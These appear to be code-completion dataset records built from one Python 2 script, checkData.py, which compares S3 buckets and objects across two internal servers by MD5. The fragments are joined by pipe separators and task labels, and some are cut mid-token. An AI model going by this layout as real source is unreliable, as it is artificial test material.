#python 2.7以下存在bug,不能直接使用close()方法关闭连接,不然客户端存在CLOSE_WAIT状态。
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
if __name__ == '__main__':
global MD5_Global_
printResult = time.time()
Service_1= '100.61.5.3'
Service_2 = '100.61.5.13'
#可以指定多个用户的AK,SK
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAMSTUBTEST000101',]
#server = '127.0.0.1', isSecure = False, timeout=80, serialNo = None, longConnection = False
server1_conn = s3PyCmd.MyHTTPConnection(host=Service_1, isSecure=False, timeout=600, serialNo=0, longConnection=False)
server2_conn = s3PyCmd.MyHTTPConnection(host=Service_2, isSecure=False, timeout=600, serialNo=0, longConnection=False)
totalObjectsOK = 0
totalObjectsErr = 0
totalReadErr = 0
userOK=True
for AKSK in User_AKSK:
print 'INFO: compare user %s' %AKSK
#列举用户所有桶
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListUserBuckets', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost = False, domainName = '', region='')
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Buckets_1 = make_request(s3Requesthandler1)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Buckets_2 = make_request(s3Requesthandler2)
#比较桶是否一致
Buckets_1 = getAllBucketsFromXML(Buckets_1)
Buckets_2 = getAllBucketsFromXML(Buckets_2)
logging.info('Buckets_1: %r, Buckets_2: %r' %(Buckets_1, Buckets_2))
print 'Buckets on Server1: %r, Buckets on Server2: %r' %(Buckets_1, Buckets_2)
Buckets = set(Buckets_1) & set(Buckets_2)
if not Buckets:
logging.error('find no same buckets exit')
print 'ERROR: no same buckets for this user'
break
open('Objects_1_List.txt','w').write('')
open('Objects_2_List.txt','w').write('')
#遍历桶
for bucket in Buckets:
open('Objects_1_List.txt','a').write('\n' + bucket)
open('Objects_2_List.txt','a').write('\n' + bucket)
msg = 'INFO: compare bucket: %s' %bucket
logging.info(msg)
print msg
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListObjectsInBucket', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
s3Request.queryArgs['max-keys'] = '999'
s3Request.queryArgs['versions'] = None
s3Request.bucket = bucket
Objects_1_List = []; Objects_2_List = []
k_marker1 = ''; k_marker2=''
v_marker1 = ''; v_marker2=''
while k_marker1 != None or k_marker2 != None:
if k_marker1 != None:
if k_marker1: s3Request.queryArgs['key-marker'] = k_marker1
if v_marker1: s3Request.queryArgs['version-id-marker'] = v_marker1
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Objects_1 = make_request(s3Requesthandler1)
k_marker1 = getMarkerFromXML(Objects_1, 'NextKeyMarker')
v_marker1 = getMarkerFromXML(Objects_1, 'NextVersionIdMarker')
if v_marker1 == 'null': v_marker1 = None
newObjs1 = getAllObjectsFromXML(Objects_1)
Objects_1_List += newObjs1
logging.debug('Objects_1_List: %s' %Objects_1_List)
open('Objects_1_List.txt','a').write('\n\t' + str(newObjs1).replace('), (', '\n\t'))
if k_marker2 != None:
if k_marker2: s3Request.queryArgs['key-marker'] = k_marker2
if v_marker2: s3Request.queryArgs['version-id-marker'] = v_marker2
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Objects_2 = make_request(s3Requesthandler2)
k_marker2 = getMarkerFromXML(Objects_2, 'NextKeyMarker')
v_marker2 = getMarkerFromXML(Objects_2, 'NextVersionIdMarker')
if v_marker2 == 'null': v_marker2 = None
newObjs2 = getAllObjectsFromXML(Objects_2)
Objects_2_List += newObjs2
logging.debug('Objects_2_List: %s' %Objects_2_List)
open('Objects_2_List.txt','a').write('\n\t' + str(newObjs2).replace('), (', '\n\t'))
#找到合集中相同集合
Obj12 = set(Objects_1_List) & set(Objects_2_List)
logging.info('get same objects %d, len Obj1:%d, lenObj2:%d' %(len(Obj12),len(Objects_1_List), len(Objects_2_List)))
#校验obj
for obj in Obj12:
#2边读对象
msg = 'INFO: compare object: %s/%s' %(bucket,obj)
#print msg
logging.info(msg)
s3Request_getobj = s3PyCmd.S3RequestDescriptor(requestType = 'GetObject', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
s3Request_getobj.bucket = bucket
s3Request_getobj.key = obj[0]
if obj[1]: s3Request_getobj.queryArgs['versionId'] = obj[1]
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request_getobj, server1_conn)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request_getobj, server2_conn)
t1 = threading.Thread(target=make_request, name='thread1', args=(s3Requesthandler1, True, True))
t1.start();
md5_2 = make_request(s3Requesthandler2, True, False)
t1.join();
md5_1 = MD5_Global
if not md5_1 or not md5_2:
totalReadErr += 2
msg = 'ERROR: read Object error. can not get md5. %s/%s, md5_1:%s, md5_2:%s' %(bucket, obj, md5_1, md5_2)
print msg; logging.error(msg)
elif md5_1 != md5_2:
totalObjectsErr += 2
msg = 'ERROR: Data Not Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2)
print msg
logging.error(msg)
elif md5_1 == md5_2:
totalObjectsOK += 2
logging.info('Data Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2))
if time.time() - printResult > 10:
progress = 'INFO: totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
print progress; logging.info(progress)
printResult = time.time()
#去掉各自相同的部分
Objects_1_List = list(set(Objects_1_List) - Obj12)
Objects_2_List = list(set(Objects_2_List) - Obj12)
#如果不相同的部分相差超过了10000个,跳过该桶
if len(Objects_1_List)>10000 or len(Objects_2_List) >10000:
msg = 'ERROR: too many objects not equal, jump this bucket...'
totalObjectsErr += 10000
logging.error(msg); print msg;
break
if Objects_1_List:
totalObjectsErr += len(Objects_1_List)
msg = 'ERROR: Objects in server1 but not in server2 %r' %Objects_1_List
print msg
logging.error(msg)
if Objects_2_List:
totalObjectsErr += len(Objects_2_List)
msg = 'ERROR: Objects in server2 but not in server1 %r' %Objects_2_List
print msg
logging.error(msg)
logging.info('totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr))
print 'totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
| rFromXML(xmlBody | identifier_name |
checkData.py | #!/usr/bin/python
# -*- coding:utf-8 -*-
import s3PyCmd
import hashlib
import random
import logging
import re
import time
import os
import threading
logFile = 'log/checkData.log'
if not os.path.exists('log'): os.mkdir('log')
if os.path.exists(logFile) and os.path.getsize(logFile) > 104857600: os.remove(logFile)
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(thread)d %(filename)s:%(lineno)d %(levelname)s %(message)s', filename=logFile, filemode='a')
MD5_Global = None
def getAllBucketsFromXML(xmlBody):
return sorted(re.findall('<Name>(.+?)</Name>', xmlBody))
#返回列表
def getAllObjectsFromXML(xmlBody):
keys = re.findall('<Key>(.+?)</Key>', xmlBody)
versions = re.findall('<VersionId>(.+?)</VersionId>', xmlBody)
for i in range(len(versions)):
if versions[i] == 'null': versions[i]=None | if not len(versions): versions = [None for i in range(len(keys))]
return zip(keys,versions)
def getMarkerFromXML(xmlBody, markerStr):
marker = re.findall('<' + markerStr + '>(.+?)</' + markerStr + '>', xmlBody)
if marker and marker[0]:
logging.info('get marker in response %s' %marker[0])
return marker[0]
else:
logging.info('get no marker in response')
return None
#若calMd5为True,返回body MD5,否则返回响应body内容。
#若响应错误,返回空。
def make_request(s3Requesthandler,calMd5 = None, process=None):
global MD5_Global
myHTTPConnection = s3Requesthandler.myHTTPConnection
s3Request = s3Requesthandler.s3Request
returnData = None
#如果计算MD5则随机一个CHUNK_SIZE,否则固定CHUNK_SIZE大小。
if calMd5:
md5hashPart = 0; md5hashTotal = 0; fileHash = hashlib.md5();
checkData = False
CHUNK_SIZE = random.randint(4096,1048576)
logging.debug('CHUNK_SIZE: %d' %CHUNK_SIZE)
else: CHUNK_SIZE = 65536
peerAddr = myHTTPConnection.host; localAddr = ''
httpResponse = None
recvBody = ''
start_time = time.time()
end_time=0; status = '9999 '
try:
start_time = time.time()
myHTTPConnection.connection.putrequest(s3Request.method, s3Request.url, skip_host=1)
#发送HTTP头域
for k in s3Request.headers.keys():
myHTTPConnection.connection.putheader(k, s3Request.headers[k])
myHTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(s3Request.requestType, localAddr, peerAddr, s3Request.url, s3Request.headers, s3Request.sendContent[0:1024]))
myHTTPConnection.connection.send(s3Request.sendContent)
waitResponseTimeStart = time.time()
#接收响应
httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
waitResponseTime = time.time() - waitResponseTimeStart
logging.debug('get response, wait time %.3f' %waitResponseTime)
#读取响应体
contentLength = int(httpResponse.getheader('Content-Length', '-1'))
logging.debug('get ContentLength: %d' %contentLength)
#区分不同的请求,对于成功响应的GetObject请求,需要特殊处理,否则一次读完body内容。
#需要考虑range下载,返回2xx均为正常请求。
recvBytes = 0
if (httpResponse.status < 300) and s3Request.requestType in ('GetObject'):
#同时满足条件,才校验数据内容。
#1.打开calMd5开关。2.GetObject操作;3.正确返回200响应(206不计算)
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
#要读完数据才算请求结束
end_time = time.time()
status = str(httpResponse.status) + ' ' + httpResponse.reason
#记日志、重定向(<400:debug; >=400,<500: warn; >=500:error)
if httpResponse.status < 400:
logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #标记外部流控
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
#部分错误结果的头域中没有包含x-amz-request-id,则从recvBody中获取
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if s3Request.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, s3Request.requestType, localAddr, peerAddr, s3Request.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(s3Request.bucket, s3Request.key, stack)
finally:
if not end_time: end_time = time.time()
#关闭连接:1.按服务端语义,若connection:close,则关闭连接。
if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
#关闭连接,让后续请求再新建连接。
logging.info('server inform to close connection')
myHTTPConnection.closeConnection()
#2.客户端感知的连接类错误,关闭连接。
elif not status <= '600':
logging.warning('caught exception, close connection')
#很可能是网络异常,关闭连接,让后续请求再新建连接。
myHTTPConnection.closeConnection()
time.sleep(.1)
#3.客户端配置了短连接
elif not myHTTPConnection.longConnection:
#python 2.7以下存在bug,不能直接使用close()方法关闭连接,不然客户端存在CLOSE_WAIT状态。
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
if __name__ == '__main__':
global MD5_Global_
printResult = time.time()
Service_1= '100.61.5.3'
Service_2 = '100.61.5.13'
#可以指定多个用户的AK,SK
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAMSTUBTEST000101',]
#server = '127.0.0.1', isSecure = False, timeout=80, serialNo = None, longConnection = False
server1_conn = s3PyCmd.MyHTTPConnection(host=Service_1, isSecure=False, timeout=600, serialNo=0, longConnection=False)
server2_conn = s3PyCmd.MyHTTPConnection(host=Service_2, isSecure=False, timeout=600, serialNo=0, longConnection=False)
totalObjectsOK = 0
totalObjectsErr = 0
totalReadErr = 0
userOK=True
for AKSK in User_AKSK:
print 'INFO: compare user %s' %AKSK
#列举用户所有桶
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListUserBuckets', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost = False, domainName = '', region='')
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Buckets_1 = make_request(s3Requesthandler1)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Buckets_2 = make_request(s3Requesthandler2)
#比较桶是否一致
Buckets_1 = getAllBucketsFromXML(Buckets_1)
Buckets_2 = getAllBucketsFromXML(Buckets_2)
logging.info('Buckets_1: %r, Buckets_2: %r' %(Buckets_1, Buckets_2))
print 'Buckets on Server1: %r, Buckets on Server2: %r' %(Buckets_1, Buckets_2)
Buckets = set(Buckets_1) & set(Buckets_2)
if not Buckets:
logging.error('find no same buckets exit')
print 'ERROR: no same buckets for this user'
break
open('Objects_1_List.txt','w').write('')
open('Objects_2_List.txt','w').write('')
#遍历桶
for bucket in Buckets:
open('Objects_1_List.txt','a').write('\n' + bucket)
open('Objects_2_List.txt','a').write('\n' + bucket)
msg = 'INFO: compare bucket: %s' %bucket
logging.info(msg)
print msg
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListObjectsInBucket', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
s3Request.queryArgs['max-keys'] = '999'
s3Request.queryArgs['versions'] = None
s3Request.bucket = bucket
Objects_1_List = []; Objects_2_List = []
k_marker1 = ''; k_marker2=''
v_marker1 = ''; v_marker2=''
while k_marker1 != None or k_marker2 != None:
if k_marker1 != None:
if k_marker1: s3Request.queryArgs['key-marker'] = k_marker1
if v_marker1: s3Request.queryArgs['version-id-marker'] = v_marker1
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Objects_1 = make_request(s3Requesthandler1)
k_marker1 = getMarkerFromXML(Objects_1, 'NextKeyMarker')
v_marker1 = getMarkerFromXML(Objects_1, 'NextVersionIdMarker')
if v_marker1 == 'null': v_marker1 = None
newObjs1 = getAllObjectsFromXML(Objects_1)
Objects_1_List += newObjs1
logging.debug('Objects_1_List: %s' %Objects_1_List)
open('Objects_1_List.txt','a').write('\n\t' + str(newObjs1).replace('), (', '\n\t'))
if k_marker2 != None:
if k_marker2: s3Request.queryArgs['key-marker'] = k_marker2
if v_marker2: s3Request.queryArgs['version-id-marker'] = v_marker2
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Objects_2 = make_request(s3Requesthandler2)
k_marker2 = getMarkerFromXML(Objects_2, 'NextKeyMarker')
v_marker2 = getMarkerFromXML(Objects_2, 'NextVersionIdMarker')
if v_marker2 == 'null': v_marker2 = None
newObjs2 = getAllObjectsFromXML(Objects_2)
Objects_2_List += newObjs2
logging.debug('Objects_2_List: %s' %Objects_2_List)
open('Objects_2_List.txt','a').write('\n\t' + str(newObjs2).replace('), (', '\n\t'))
#找到合集中相同集合
Obj12 = set(Objects_1_List) & set(Objects_2_List)
logging.info('get same objects %d, len Obj1:%d, lenObj2:%d' %(len(Obj12),len(Objects_1_List), len(Objects_2_List)))
#校验obj
for obj in Obj12:
#2边读对象
msg = 'INFO: compare object: %s/%s' %(bucket,obj)
#print msg
logging.info(msg)
s3Request_getobj = s3PyCmd.S3RequestDescriptor(requestType = 'GetObject', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
s3Request_getobj.bucket = bucket
s3Request_getobj.key = obj[0]
if obj[1]: s3Request_getobj.queryArgs['versionId'] = obj[1]
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request_getobj, server1_conn)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request_getobj, server2_conn)
t1 = threading.Thread(target=make_request, name='thread1', args=(s3Requesthandler1, True, True))
t1.start();
md5_2 = make_request(s3Requesthandler2, True, False)
t1.join();
md5_1 = MD5_Global
if not md5_1 or not md5_2:
totalReadErr += 2
msg = 'ERROR: read Object error. can not get md5. %s/%s, md5_1:%s, md5_2:%s' %(bucket, obj, md5_1, md5_2)
print msg; logging.error(msg)
elif md5_1 != md5_2:
totalObjectsErr += 2
msg = 'ERROR: Data Not Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2)
print msg
logging.error(msg)
elif md5_1 == md5_2:
totalObjectsOK += 2
logging.info('Data Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2))
if time.time() - printResult > 10:
progress = 'INFO: totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
print progress; logging.info(progress)
printResult = time.time()
#去掉各自相同的部分
Objects_1_List = list(set(Objects_1_List) - Obj12)
Objects_2_List = list(set(Objects_2_List) - Obj12)
#如果不相同的部分相差超过了10000个,跳过该桶
if len(Objects_1_List)>10000 or len(Objects_2_List) >10000:
msg = 'ERROR: too many objects not equal, jump this bucket...'
totalObjectsErr += 10000
logging.error(msg); print msg;
break
if Objects_1_List:
totalObjectsErr += len(Objects_1_List)
msg = 'ERROR: Objects in server1 but not in server2 %r' %Objects_1_List
print msg
logging.error(msg)
if Objects_2_List:
totalObjectsErr += len(Objects_2_List)
msg = 'ERROR: Objects in server2 but not in server1 %r' %Objects_2_List
print msg
logging.error(msg)
logging.info('totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr))
print 'totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr) | if len(versions)>0 and len(versions) != len(keys):
logging.error('response error, versions != keys %s' %xmlBody)
return [] | random_line_split |
checkData.py | #!/usr/bin/python
# -*- coding:utf-8 -*-
import s3PyCmd
import hashlib
import random
import logging
import re
import time
import os
import threading
logFile = 'log/checkData.log'
if not os.path.exists('log'): os.mkdir('log')
if os.path.exists(logFile) and os.path.getsize(logFile) > 104857600: os.remove(logFile)
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(thread)d %(filename)s:%(lineno)d %(levelname)s %(message)s', filename=logFile, filemode='a')
MD5_Global = None
def getAllBucketsFromXML(xmlBody):
return sorted(re.findall('<Name>(.+?)</Name>', xmlBody))
#返回列表
def getAllObjectsFromXML(xmlBody):
keys = re.findall('<Key>(.+?)</Key>', xmlBody)
versions = re.findall('<VersionId>(.+?)</VersionId>', xmlBody)
for i in range(len(versions)):
if versions[i] == 'null': versions[i]=None
if len(versions)>0 and len(versions) != len(keys):
logging.error('response error, versions != keys %s' %xmlBody)
return []
if not len(versions): versions = [None for i in range(len(keys))]
return zip(keys,versions)
def getMarkerFromXML(xmlBody, markerStr):
marker = re.findall('<' + markerStr + '>(.+?)</' + markerStr + '>', xmlBody)
if marker and marker[0]:
logging.info('get marker in response %s' %marker[0])
return marker[0]
else:
logging.info('get no marker in response')
return None
#若calMd5为True,返回body MD5,否则返回响应body内容。
#若响应错误,返回空。
def make_request(s3Requesthandler,calMd5 = None, process=None):
global MD5_Global
myHTTPConnection = s3Requesthandler.myHTTPConnection
s3Request = s3Requesthandler.s3Request
returnData = None
#如果计算MD5则随机一个CHUNK_SIZE,否则固定CHUNK_SIZE大小。
if calMd5:
md5hashPart = 0; md5hashTotal = 0; fileHash = hashlib.md5();
checkData = False
CHUNK_SIZE = random.randint(4096,1048576)
logging.debug('CHUNK_SIZE: %d' %CHUNK_SIZE)
else: CHUNK_SIZE = 65536
peerAddr = myHTTPConnection.host; localAddr = ''
httpResponse = None
recvBody = ''
start_time = time.time()
end_time=0; status = '9999 '
try:
start_time = time.time()
myHTTPConnection.connection.putrequest(s3Request.method, s3Request.url, skip_host=1)
#发送HTTP头域
for k in s3Request.headers.keys():
myHTTPConnection.connection.putheader(k, s3Request.headers[k])
myHTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(s3Request.requestType, localAddr, peerAddr, s3Request.url, s3Request.headers, s3Request.sendContent[0:1024]))
myHTTPConnection.connection.send(s3Request.sendContent)
waitResponseTimeStart = time.time()
#接收响应
httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
waitResponseTime = time.time() - waitResponseTimeStart
logging.debug('get response, wait time %.3f' %waitResponseTime)
#读取响应体
contentLength = int(httpResponse.getheader('Content-Length', '-1'))
logging.debug('get ContentLength: %d' %contentLength)
#区分不同的请求,对于成功响应的GetObject请求,需要特殊处理,否则一次读完body内容。
#需要考虑range下载,返回2xx均为正常请求。
recvBytes = 0
if (httpResponse.status < 300) and s3Request.requestType in ('GetObject'):
#同时满足条件,才校验数据内容。
#1.打开calMd5开关。2.GetObject操作;3.正确返回200响应(206不计算)
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
#要读完数据才算请求结束
end_time = time.time()
status = str(httpResponse.status) + ' ' + httpResponse.rea | #记日志、重定向(<400:debug; >=400,<500: warn; >=500:error)
if httpResponse.status < 400:
logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #标记外部流控
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
#部分错误结果的头域中没有包含x-amz-request-id,则从recvBody中获取
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if s3Request.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, s3Request.requestType, localAddr, peerAddr, s3Request.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(s3Request.bucket, s3Request.key, stack)
finally:
if not end_time: end_time = time.time()
#关闭连接:1.按服务端语义,若connection:close,则关闭连接。
if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
#关闭连接,让后续请求再新建连接。
logging.info('server inform to close connection')
myHTTPConnection.closeConnection()
#2.客户端感知的连接类错误,关闭连接。
elif not status <= '600':
logging.warning('caught exception, close connection')
#很可能是网络异常,关闭连接,让后续请求再新建连接。
myHTTPConnection.closeConnection()
time.sleep(.1)
#3.客户端配置了短连接
elif not myHTTPConnection.longConnection:
#python 2.7以下存在bug,不能直接使用close()方法关闭连接,不然客户端存在CLOSE_WAIT状态。
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
if __name__ == '__main__':
global MD5_Global_
printResult = time.time()
Service_1= '100.61.5.3'
Service_2 = '100.61.5.13'
#可以指定多个用户的AK,SK
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAMSTUBTEST000101',]
#server = '127.0.0.1', isSecure = False, timeout=80, serialNo = None, longConnection = False
server1_conn = s3PyCmd.MyHTTPConnection(host=Service_1, isSecure=False, timeout=600, serialNo=0, longConnection=False)
server2_conn = s3PyCmd.MyHTTPConnection(host=Service_2, isSecure=False, timeout=600, serialNo=0, longConnection=False)
totalObjectsOK = 0
totalObjectsErr = 0
totalReadErr = 0
userOK=True
for AKSK in User_AKSK:
print 'INFO: compare user %s' %AKSK
#列举用户所有桶
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListUserBuckets', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost = False, domainName = '', region='')
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Buckets_1 = make_request(s3Requesthandler1)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Buckets_2 = make_request(s3Requesthandler2)
#比较桶是否一致
Buckets_1 = getAllBucketsFromXML(Buckets_1)
Buckets_2 = getAllBucketsFromXML(Buckets_2)
logging.info('Buckets_1: %r, Buckets_2: %r' %(Buckets_1, Buckets_2))
print 'Buckets on Server1: %r, Buckets on Server2: %r' %(Buckets_1, Buckets_2)
Buckets = set(Buckets_1) & set(Buckets_2)
if not Buckets:
logging.error('find no same buckets exit')
print 'ERROR: no same buckets for this user'
break
open('Objects_1_List.txt','w').write('')
open('Objects_2_List.txt','w').write('')
#遍历桶
for bucket in Buckets:
open('Objects_1_List.txt','a').write('\n' + bucket)
open('Objects_2_List.txt','a').write('\n' + bucket)
msg = 'INFO: compare bucket: %s' %bucket
logging.info(msg)
print msg
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListObjectsInBucket', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
s3Request.queryArgs['max-keys'] = '999'
s3Request.queryArgs['versions'] = None
s3Request.bucket = bucket
Objects_1_List = []; Objects_2_List = []
k_marker1 = ''; k_marker2=''
v_marker1 = ''; v_marker2=''
while k_marker1 != None or k_marker2 != None:
if k_marker1 != None:
if k_marker1: s3Request.queryArgs['key-marker'] = k_marker1
if v_marker1: s3Request.queryArgs['version-id-marker'] = v_marker1
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Objects_1 = make_request(s3Requesthandler1)
k_marker1 = getMarkerFromXML(Objects_1, 'NextKeyMarker')
v_marker1 = getMarkerFromXML(Objects_1, 'NextVersionIdMarker')
if v_marker1 == 'null': v_marker1 = None
newObjs1 = getAllObjectsFromXML(Objects_1)
Objects_1_List += newObjs1
logging.debug('Objects_1_List: %s' %Objects_1_List)
open('Objects_1_List.txt','a').write('\n\t' + str(newObjs1).replace('), (', '\n\t'))
if k_marker2 != None:
if k_marker2: s3Request.queryArgs['key-marker'] = k_marker2
if v_marker2: s3Request.queryArgs['version-id-marker'] = v_marker2
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Objects_2 = make_request(s3Requesthandler2)
k_marker2 = getMarkerFromXML(Objects_2, 'NextKeyMarker')
v_marker2 = getMarkerFromXML(Objects_2, 'NextVersionIdMarker')
if v_marker2 == 'null': v_marker2 = None
newObjs2 = getAllObjectsFromXML(Objects_2)
Objects_2_List += newObjs2
